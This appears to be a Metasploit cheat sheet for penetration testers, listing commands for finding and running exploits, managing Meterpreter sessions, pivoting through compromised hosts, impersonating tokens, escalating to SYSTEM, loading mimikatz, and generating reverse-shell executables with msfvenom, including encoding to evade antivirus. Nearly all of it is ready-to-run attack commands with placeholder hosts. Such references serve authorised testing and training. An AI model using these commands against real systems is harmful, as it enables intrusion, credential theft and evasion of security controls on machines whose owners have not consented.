Metasploit – Cheatsheet

Reconnaissance

Search for an exploit

search <version / service name / port>

Structure

auxiliary/ # Modules such as scanners, crawlers and fuzzers can be found here.

encoders/  # Encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.

evasion/   # Encode the payload to try to evade antivirus software.

exploits/  # Exploits, neatly organized by target system.

payloads/        # Code that will run on the target system. 
├── adapters/    # An adapter wraps single payloads to convert them into different formats
├── singles/      # Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
├── stagers/      # Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads
└── stages/       # Downloaded by the stager.

post/     # Post-exploitation modules.

Weaponization

Select an exploit

use <exploit-path>

Deselect the current module

back

Show the module options

show options 

Show compatible payloads

show payloads 

Set an option

set <option-name> <value>

Exploitation

Run the exploit

exploit

Run post-exploitation modules against an existing session

0xlun@Lunatik $ [CTRL+Z]
msf5 > sessions -l 
msf5 > use post/<path>
msf5 > set SESSION <session-id>
msf5 > run 

Sessions

Background the current session (terminal)

[CTRL+Z]

List sessions

sessions

Interact with a session

sessions -i <session-id>

Add a route (use a meterpreter session as a proxy/pivot):

route add <CIDR> <session-id>
route print

The session must be able to reach the specified network. Routes can be added automatically with autoroute:

use post/multi/manage/autoroute
show options
sessions -l
set SESSION <session-id>
run

These routes can then be reached through a SOCKS proxy:

use auxiliary/server/socks_proxy 
show options
set SRVHOST 127.0.0.1
set VERSION 5
run -j

Shell To Meterpreter

Via the shell_to_meterpreter module:

msf5 > use post/multi/manage/shell_to_meterpreter
msf5 > set SESSION <session-id>
msf5 > run 

Via the sessions command:

sessions -u <session-id>
sessions -u -1  # For the last active session

Meterpreter

Starting the handler (listener) in msfconsole

lun$ msfconsole
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show payloads
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.99
msf5 exploit(multi/handler) > set LPORT 443
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.0.99:443  

Idle time of the machine:

idletime

System information:

sysinfo 

Download [ victim >> attacker ]

download <source> <destination>

Upload [ attacker >> victim ]

upload <source> <destination>

Execute a command (interactive, hidden window):

execute -f <command> -i -H

Get a standard shell:

shell 

Get a PowerShell shell:

load powershell
powershell_shell

Become SYSTEM (check the user before and after):

getuid
getsystem
getuid

Migrate to another process:

migrate <pid>

Commands on the local (attacker) machine:

lpwd   # local pwd
lcd    # local cd
lls    # local ls
lcat   # local cat

Get the integrity level of our process:

shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

Incognito

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help

Incognito Commands
==================

    Command              Description                                             
    -------              -----------                                             
    add_group_user       Attempt to add a user to a global group with all tokens 
    add_localgroup_user  Attempt to add a user to a local group with all tokens  
    add_user             Attempt to add a user with all tokens                   
    impersonate_token    Impersonate specified token                             
    list_tokens          List tokens available under current user context        
    snarf_hashes         Snarf challenge/response hashes for every token         

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator

Post-exploitation modules

msf5 > use <exploit>
msf5 exploit(<exploit>) > set SESSION <session-id>
msf5 exploit(<exploit>) > set LPORT <port>
msf5 exploit(<exploit>) > set LHOST <host>
msf5 exploit(<exploit>) > run

exploit/windows/local/bypassuac_sdclt       # bypass UAC
exploit/windows/smb/psexec                  # psexec
post/multi/recon/local_exploit_suggester    # local exploit suggester

Load the mimikatz (kiwi) extension in the meterpreter shell:

meterpreter > load kiwi       # mimikatz module 
meterpreter > help

Msfvenom

List payloads and encoders:

msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders

Common payloads:

windows/shell_reverse_tcp              # x86 simple reverse shell
windows/x64/shell_reverse_tcp          # x64 simple reverse shell
windows/meterpreter/reverse_tcp        # x86 meterpreter reverse shell
windows/x64/meterpreter/reverse_tcp    # x64 meterpreter reverse shell

linux/x86/shell_reverse_tcp            # x86 simple reverse shell
linux/x64/shell_reverse_tcp            # x64 simple reverse shell
linux/x86/meterpreter/reverse_tcp      # x86 meterpreter reverse shell
linux/x64/meterpreter/reverse_tcp      # x64 meterpreter reverse shell

Others: msfvenom -l payloads

List the options of a payload:

msfvenom -p <payload/path> --list-options

Generate an EXE:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
msfvenom -p windows/meterpreter/bind_tcp LPORT=<PORT> -f exe -o bind.exe

Generate a DLL:

msfvenom -p <payload/path> <option>=<value> -f dll -o <dllname>.dll

Generate an ASP/ASPX file:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > reverse.aspx

Obfuscation (encoder):

msfvenom -p windows/meterpreter/reverse_tcp --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe

Formats (-f) :

# Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war

# Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscr